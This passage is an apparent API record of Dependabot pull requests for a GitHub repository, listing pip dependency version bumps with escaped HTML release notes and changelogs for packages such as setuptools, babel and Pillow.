\u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7798\"\u003e#7798\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse consistent arguments for load_read and load_seek \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7713\"\u003e#7713\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eTurn off nullability warnings for macOS SDK \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7827\"\u003e#7827\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix shift-sign issue in Convert.c \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7838\"\u003e#7838\u003c/a\u003e [\u003ca href=\"https://github.com/r-barnes\"\u003e\u003ccode\u003e@​r-barnes\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003ewinbuild: Refactor dependency versions into constants \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7843\"\u003e#7843\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eBuild macOS arm64 wheels natively \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7852\"\u003e#7852\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFixed typo \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7855\"\u003e#7855\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eOpen 16-bit grayscale PNGs as I;16 \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7849\"\u003e#7849\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eHandle truncated chunks at the end of PNG images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7709\"\u003e#7709\u003c/a\u003e [\u003ca href=\"https://github.com/lajiyuan\"\u003e\u003ccode\u003e@​lajiyuan\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eMatch mask size to pasted image size in GifImagePlugin \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7779\"\u003e#7779\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca h...\n\n_Description has been truncated_","html_url":"https://github.com/perplext/faraday/pull/2","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/perplext%2Ffaraday/issues/2","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/2/packages"},{"uuid":"2732831894","node_id":"PR_kwDOAsEugc6i47SW","number":1,"state":"open","title":"Bump the pip group across 2 directories with 19 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-08-09T17:26:33.000Z","updated_at":"2025-08-09T17:26:34.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":19,"packages":[{"name":"setuptools","old_version":"18.3.1","new_version":"78.1.1","repository_url":"https://github.com/pypa/setuptools"},{"name":"babel","old_version":"2.0","new_version":"2.17.0","repository_url":"https://github.com/python-babel/babel"},{"name":"bleach","old_version":"1.4.1","new_version":"6.2.0","repository_url":"https://github.com/mozilla/bleach"},{"name":"celery","old_version":"3.1.18","new_version":"5.5.3","repository_url":"https://github.com/celery/celery"},{"name":"certifi","old_version":"2015.9.6.1","new_version":"2024.7.4","repository_url":"https://github.com/certifi/python-certifi"},{"name":"django","old_version":"1.8.5","new_version":"4.2.22","repository_url":"https://github.com/django/django"},{"name":"django-grappelli","old_version":"2.7.1","new_version":"2.15.2","repository_url":"https://github.com/sehmaschine/django-grappelli"},{"name":"djangorestframework","old_version":"3.2.3","new_version":"3.15.2","repository_url":"https://github.com/encode/django-rest-framework"},{"name":"gitpython","old_version":"0.1.7","new_version":"3.1.41","repository_url":"https://github.com/gitpython-developers/GitPython"},{"name":"html5lib","old_version":"0.999999","new_version":"0.999999999","repository_url":"https://github.com/html5lib/html5lib-python"},{"name":"requests","old_version":"2.7.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"urllib3","old_version":"1.8","new_version":"2.5.0","repository_url":"https://github.com/urllib3/urllib3"},{"name":"py","old_version":"1.4.30","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"pyyaml","old_version":"3.11","new_version":"6.0.2","repository_url":"https://github.com/yaml/pyyaml"},{"name":"virtualenv","old_version":"13.1.2","new_version":"20.26.6","repository_url":"https://github.com/pypa/virtualenv"},{"name":"jinja2","old_version":"2.5.5","new_version":"3.1.6","repository_url":"https://github.com/pallets/jinja"},{"name":"lxml","old_version":"3.4.4","new_version":"4.9.1","repository_url":"https://github.com/lxml/lxml"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 17 updates in the /requirements directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [setuptools](https://github.com/pypa/setuptools) | `18.3.1` | `78.1.1` |\n| [babel](https://github.com/python-babel/babel) | `2.0` | `2.17.0` |\n| [bleach](https://github.com/mozilla/bleach) | `1.4.1` | `6.2.0` |\n| [celery](https://github.com/celery/celery) | `3.1.18` | `5.5.3` |\n| [certifi](https://github.com/certifi/python-certifi) | `2015.9.6.1` | `2024.7.4` |\n| [django](https://github.com/django/django) | `1.8.5` | `4.2.22` |\n| [django-grappelli](https://github.com/sehmaschine/django-grappelli) | `2.7.1` | `2.15.2` |\n| [djangorestframework](https://github.com/encode/django-rest-framework) | `3.2.3` | `3.15.2` |\n| [gitpython](https://github.com/gitpython-developers/GitPython) | `0.1.7` | `3.1.41` |\n| [html5lib](https://github.com/html5lib/html5lib-python) | `0.999999` | `0.999999999` |\n| [requests](https://github.com/psf/requests) | `2.7.0` | `2.32.4` |\n| [urllib3](https://github.com/urllib3/urllib3) | `1.8` | `2.5.0` |\n| [py](https://github.com/pytest-dev/py) | `1.4.30` | `1.11.0` |\n| [pyyaml](https://github.com/yaml/pyyaml) | `3.11` | `6.0.2` |\n| [virtualenv](https://github.com/pypa/virtualenv) | `13.1.2` | `20.26.6` |\n| [jinja2](https://github.com/pallets/jinja) | `2.5.5` | `3.1.6` |\n| [lxml](https://github.com/lxml/lxml) | `3.4.4` | `4.9.1` |\n\nBumps the pip group with 6 updates in the /smoketests directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [certifi](https://github.com/certifi/python-certifi) | `2015.9.6.2` | `2024.7.4` |\n| [requests](https://github.com/psf/requests) | `2.8.1` | `2.32.4` |\n| [py](https://github.com/pytest-dev/py) | `1.4.30` | `1.11.0` |\n| [pyyaml](https://github.com/yaml/pyyaml) | `3.11` | `6.0.2` |\n| [pyopenssl](https://github.com/pyca/pyopenssl) | `0.15.1` | `25.1.0` |\n| [rsa](https://github.com/sybrenstuvel/python-rsa) | `3.2` | `4.9.1` |\n\n\nUpdates `setuptools` from 18.3.1 to 78.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/setuptools/blob/main/NEWS.rst\"\u003esetuptools's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003ev78.1.1\u003c/h1\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMore fully sanitized the filename in PackageIndex._download. (\u003ca href=\"https://redirect.github.com/pypa/setuptools/issues/4946\"\u003e#4946\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev78.1.0\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRestore access to _get_vc_env with a warning. (\u003ca href=\"https://redirect.github.com/pypa/setuptools/issues/4874\"\u003e#4874\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev78.0.2\u003c/h1\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePostponed removals of deprecated dash-separated and uppercase fields in \u003ccode\u003esetup.cfg\u003c/code\u003e.\nAll packages with deprecated configurations are advised to move before 2026. (\u003ca href=\"https://redirect.github.com/pypa/setuptools/issues/4911\"\u003e#4911\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev78.0.1\u003c/h1\u003e\n\u003ch2\u003eMisc\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pypa/setuptools/issues/4909\"\u003e#4909\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev78.0.0\u003c/h1\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReverted distutils changes that broke the monkey patching of command classes. (\u003ca href=\"https://redirect.github.com/pypa/setuptools/issues/4902\"\u003e#4902\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eDeprecations and Removals\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSetuptools no longer accepts options containing uppercase or dash characters in \u003ccode\u003esetup.cfg\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/setuptools/commit/8e4868a036b7fae3208d16cb4e5fe6d63c3752df\"\u003e\u003ccode\u003e8e4868a\u003c/code\u003e\u003c/a\u003e Bump version: 78.1.0 → 78.1.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/setuptools/commit/100e9a61ad24d5a147ada57357425a8d40626d09\"\u003e\u003ccode\u003e100e9a6\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/setuptools/issues/4951\"\u003e#4951\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/setuptools/commit/8faf1d7e0ca309983252e4f21837b73ee12e960f\"\u003e\u003ccode\u003e8faf1d7\u003c/code\u003e\u003c/a\u003e Add news fragment.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/setuptools/commit/2ca4a9fe4758fcd39d771d3d3a5b4840aacebdf7\"\u003e\u003ccode\u003e2ca4a9f\u003c/code\u003e\u003c/a\u003e Rely on re.sub to perform the decision in one expression.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/setuptools/commit/e409e8002932f2b86aae7b1abc8f8c2ebf96df2c\"\u003e\u003ccode\u003ee409e80\u003c/code\u003e\u003c/a\u003e Extract _sanitize method for sanitizing the filename.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/setuptools/commit/250a6d17978f9f6ac3ac887091f2d32886fbbb0b\"\u003e\u003ccode\u003e250a6d1\u003c/code\u003e\u003c/a\u003e Add a check to ensure the name resolves relative to the tmpdir.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/setuptools/commit/d8390feaa99091d1ba9626bec0e4ba7072fc507a\"\u003e\u003ccode\u003ed8390fe\u003c/code\u003e\u003c/a\u003e Extract _resolve_download_filename with test.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/setuptools/commit/4e1e89392de5cb405e7844cdc8b20fc2755dbaba\"\u003e\u003ccode\u003e4e1e893\u003c/code\u003e\u003c/a\u003e Merge \u003ca href=\"https://github.com/jaraco/skeleton\"\u003ehttps://github.com/jaraco/skeleton\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/setuptools/commit/3a3144f0d2887fa37c06550f42a101e9eebd953a\"\u003e\u003ccode\u003e3a3144f\u003c/code\u003e\u003c/a\u003e Fix typo: \u003ccode\u003epyproject.license\u003c/code\u003e -\u0026gt; \u003ccode\u003eproject.license\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/pypa/setuptools/issues/4931\"\u003e#4931\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/setuptools/commit/d751068fd2627d6d8f1729e39cbcd8119049998f\"\u003e\u003ccode\u003ed751068\u003c/code\u003e\u003c/a\u003e Fix typo: pyproject.license -\u0026gt; project.license\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pypa/setuptools/compare/18.3.1...v78.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `babel` from 2.0 to 2.17.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/releases\"\u003ebabel's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.17.0\u003c/h2\u003e\n\u003cp\u003eHappy 2025! This release is being made from FOSDEM 2025, in Brussels, Belgium. 🇧🇪\u003c/p\u003e\n\u003cp\u003eThank you to all contributors, new and old, and here's to another great year of internationalization and localization!\u003c/p\u003e\n\u003chr /\u003e\n\u003cp\u003eThe changelog below is auto-generated by GitHub.\u003c/p\u003e\n\u003cp\u003ePlease see \u003ca href=\"https://github.com/python-babel/babel/blob/b50a1d2186c20f3359f7e10853d2b2225a46ed40/CHANGES.rst\"\u003eCHANGELOG.rst\u003c/a\u003e for additional details.\u003c/p\u003e\n\u003chr /\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix deprecation warnings for \u003ccode\u003edatetime.utcnow()\u003c/code\u003e by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1119\"\u003epython-babel/babel#1119\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEnclose white spaces in references by \u003ca href=\"https://github.com/Dunedan\"\u003e\u003ccode\u003e@​Dunedan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1105\"\u003epython-babel/babel#1105\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReplace \u003ccode\u003estr.index\u003c/code\u003e with \u003ccode\u003estr.find\u003c/code\u003e by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1130\"\u003epython-babel/babel#1130\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReplace more alternate characters in \u003ccode\u003eformat_skeleton\u003c/code\u003e by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1122\"\u003epython-babel/babel#1122\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix extracted lineno with nested calls by \u003ca href=\"https://github.com/dylankiss\"\u003e\u003ccode\u003e@​dylankiss\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1126\"\u003epython-babel/babel#1126\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u0026quot;Deleted duplicate code in test\u0026quot; by \u003ca href=\"https://github.com/mattdiaz007\"\u003e\u003ccode\u003e@​mattdiaz007\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1138\"\u003epython-babel/babel#1138\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix of list index out of range error in PoFileParser.add_message when translations is empty by \u003ca href=\"https://github.com/gabe-sherman\"\u003e\u003ccode\u003e@​gabe-sherman\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1135\"\u003epython-babel/babel#1135\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake seconds optional in \u003ccode\u003eparse_time\u003c/code\u003e time formats by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1141\"\u003epython-babel/babel#1141\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMark \u003ccode\u003ewraptext\u003c/code\u003e deprecated; use \u003ccode\u003eTextWrapper\u003c/code\u003e directly in \u003ccode\u003ewrite_po\u003c/code\u003e by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1140\"\u003epython-babel/babel#1140\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix the way obsolete messages are stored by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1132\"\u003epython-babel/babel#1132\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReplace \u003ccode\u003eOrderedDict\u003c/code\u003e with just \u003ccode\u003edict\u003c/code\u003e by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1149\"\u003epython-babel/babel#1149\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse CLDR 46 by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1145\"\u003epython-babel/babel#1145\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate CI to use python 3.13 and Ubuntu 24.04 by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1153\"\u003epython-babel/babel#1153\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdjust docs/conf.py to add compatibility with sphinx 8 by \u003ca href=\"https://github.com/hrnciar\"\u003e\u003ccode\u003e@​hrnciar\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1155\"\u003epython-babel/babel#1155\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAllow specifying an explicit format in parse_date/parse_time by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1131\"\u003epython-babel/babel#1131\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSimplify \u003ccode\u003eread_mo\u003c/code\u003e logic regarding \u003ccode\u003ecatalog.charset\u003c/code\u003e by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1148\"\u003epython-babel/babel#1148\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump CI/tool versions by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1160\"\u003epython-babel/babel#1160\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: check_and_call_extract_file uses the first matching method and options, instead of the first matching method and last matching options by \u003ca href=\"https://github.com/jpmckinney\"\u003e\u003ccode\u003e@​jpmckinney\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1121\"\u003epython-babel/babel#1121\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrevent wrapping file locations containing white space by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1120\"\u003epython-babel/babel#1120\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd tzdata as dev dependency and sync with tox.ini by \u003ca href=\"https://github.com/wandrew004\"\u003e\u003ccode\u003e@​wandrew004\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1159\"\u003epython-babel/babel#1159\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport short and narrow formats for format_timedelta when using \u003ccode\u003eadd_direction\u003c/code\u003e by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1163\"\u003epython-babel/babel#1163\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove handling for \u003ccode\u003elocale=None\u003c/code\u003e by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1164\"\u003epython-babel/babel#1164\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003epytest.raises(match=...)\u003c/code\u003e by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1166\"\u003epython-babel/babel#1166\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eStrip extra leading slashes in \u003ccode\u003e/etc/localtime\u003c/code\u003e by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1165\"\u003epython-babel/babel#1165\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove redundant assignment in \u003ccode\u003eCatalog.__setitem__\u003c/code\u003e by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1167\"\u003epython-babel/babel#1167\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSmall cleanups by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1170\"\u003epython-babel/babel#1170\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSmall test cleanup by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1172\"\u003epython-babel/babel#1172\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eMessage.python_brace_format\u003c/code\u003e by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1169\"\u003epython-babel/babel#1169\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImport \u003ccode\u003eLiteral\u003c/code\u003e from the typing module by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1175\"\u003epython-babel/babel#1175\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrefer LC_MONETARY when formatting currencies by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1173\"\u003epython-babel/babel#1173\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix dates formatting \u003ccode\u003eY\u003c/code\u003e, \u003ccode\u003ew\u003c/code\u003e and \u003ccode\u003eW\u003c/code\u003e symbols for week-numbering by \u003ca href=\"https://github.com/jun66j5\"\u003e\u003ccode\u003e@​jun66j5\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1179\"\u003epython-babel/babel#1179\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIncrease test coverage of the \u003ccode\u003epython_format\u003c/code\u003e checker by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1176\"\u003epython-babel/babel#1176\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrepare for 2.17.0 by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1182\"\u003epython-babel/babel#1182\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Dunedan\"\u003e\u003ccode\u003e@​Dunedan\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1105\"\u003epython-babel/babel#1105\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/blob/master/CHANGES.rst\"\u003ebabel's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.17.0\u003c/h2\u003e\n\u003cp\u003eHappy 2025! This release is being made from FOSDEM 2025, in Brussels, Belgium.\u003c/p\u003e\n\u003cp\u003eThank you to all contributors, new and old,\nand here's to another great year of internationalization and localization!\u003c/p\u003e\n\u003cp\u003eFeatures\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* CLDR: Babel now uses CLDR 46, by @tomasr8 in :gh:`1145`\n* Dates: Allow specifying an explicit format in parse_date/parse_time by @tomasr8 in :gh:`1131`\n* Dates: More alternate characters are now supported by `format_skeleton`. By @tomasr8 in :gh:`1122`\n* Dates: Support short and narrow formats for format_timedelta when using `add_direction`, by @akx in :gh:`1163`\n* Messages: .po files now enclose white spaces in filenames like GNU gettext does. By @Dunedan in :gh:`1105`, and @tomasr8 in :gh:`1120`\n* Messages: Initial support for `Message.python_brace_format`, by @tomasr8 in :gh:`1169`\n* Numbers: LC_MONETARY is now preferred when formatting currencies, by @akx in :gh:`1173`\n\u003cp\u003eBugfixes\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDates: Make seconds optional in \u003ccode\u003eparse_time\u003c/code\u003e time formats by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1141\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDates: Replace \u003ccode\u003estr.index\u003c/code\u003e with \u003ccode\u003estr.find\u003c/code\u003e by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1130\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDates: Strip extra leading slashes in \u003ccode\u003e/etc/localtime\u003c/code\u003e by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1165\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDates: Week numbering and formatting of dates with week numbers was repaired by \u003ca href=\"https://github.com/jun66j5\"\u003e\u003ccode\u003e@​jun66j5\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1179\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eGeneral: Improve handling for \u003ccode\u003elocale=None\u003c/code\u003e by \u003ca 